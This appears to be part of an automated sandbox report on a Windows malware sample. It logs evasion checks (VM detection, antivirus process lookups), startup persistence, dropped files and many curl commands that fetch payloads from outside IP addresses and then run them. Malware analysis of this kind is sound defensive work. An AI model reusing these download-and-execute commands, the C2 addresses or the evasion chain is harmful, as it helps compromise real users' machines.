Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoSphere.url Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\systeminfo.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\zip.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\303482\Either.pif Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo64.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7zxa.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\PsInfo.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\nircmdc.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\DolphinDumps\7za.exe Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Evasive API call chain: GetSystemTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com TID: 2128 Thread sleep time: -16380000s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406301 FindFirstFileW,FindClose, 0_2_00406301
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00406CC7
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_0041C29C FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose, 52_2_0041C29C
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004107A0 FindFirstFileA, 52_2_004107A0
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_004062D5 FindFirstFileW,FindClose, 88_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00402E18 FindFirstFileW, 88_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Code function: 88_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 88_2_00406C9B
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\768032\ Jump to behavior
Source: curl.exe, 00000031.00000003.2784647329.0000000002D31000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77A
Source: curl.exe, 00000018.00000003.2545162631.0000000002831000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000025.00000003.2668520821.0000000003542000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002B.00000003.2717621741.0000000002841000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000002E.00000003.2734328426.0000000002BC1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000003.2827834731.00000000033B1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000003.2929488178.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005B.00000003.3090191494.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000063.00000003.3131480100.00000000034C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: curl.exe, 00000042.00000003.2874731169.0000000002EC1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000042.00000002.2876030793.0000000002EC4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: curl.exe, 00000028.00000003.2693793870.00000000031E1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll77l'
Source: curl.exe, 0000001C.00000002.2618466664.00000000034D9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004B.00000002.2945763230.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000003.2962294058.0000000002A11000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000003.2978571809.00000000031F1000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000054.00000002.3000425346.0000000003029000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 00000057.00000003.3058248022.0000000002E51000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll11
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process information queried: ProcessInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00406328
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe Code function: 52_2_004125F0 LeaveCriticalSection,CreateFileA,EnterCriticalSection,CreateFileA,GetKernelObjectSecurity,GetKernelObjectSecurity,GetLastError,GetProcessHeap,HeapAlloc,GetKernelObjectSecurity,SetKernelObjectSecurity,GetProcessHeap,HeapFree,CloseHandle,CreateFileA,CloseHandle, 52_2_004125F0
Enables debug privileges
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Feeling Feeling.cmd && Feeling.cmd Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768032 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Howard + ..\Los + ..\Become + ..\Mental + ..\Vermont + ..\Bt + ..\Vatican G Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\768032\Finish.com Finish.com G Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName > C:\Users\user\AppData\Local\temp\407 2>&1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C type C:\Users\user\AppData\Local\temp\407 > C:\Users\user\AppData\Local\temp\403 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
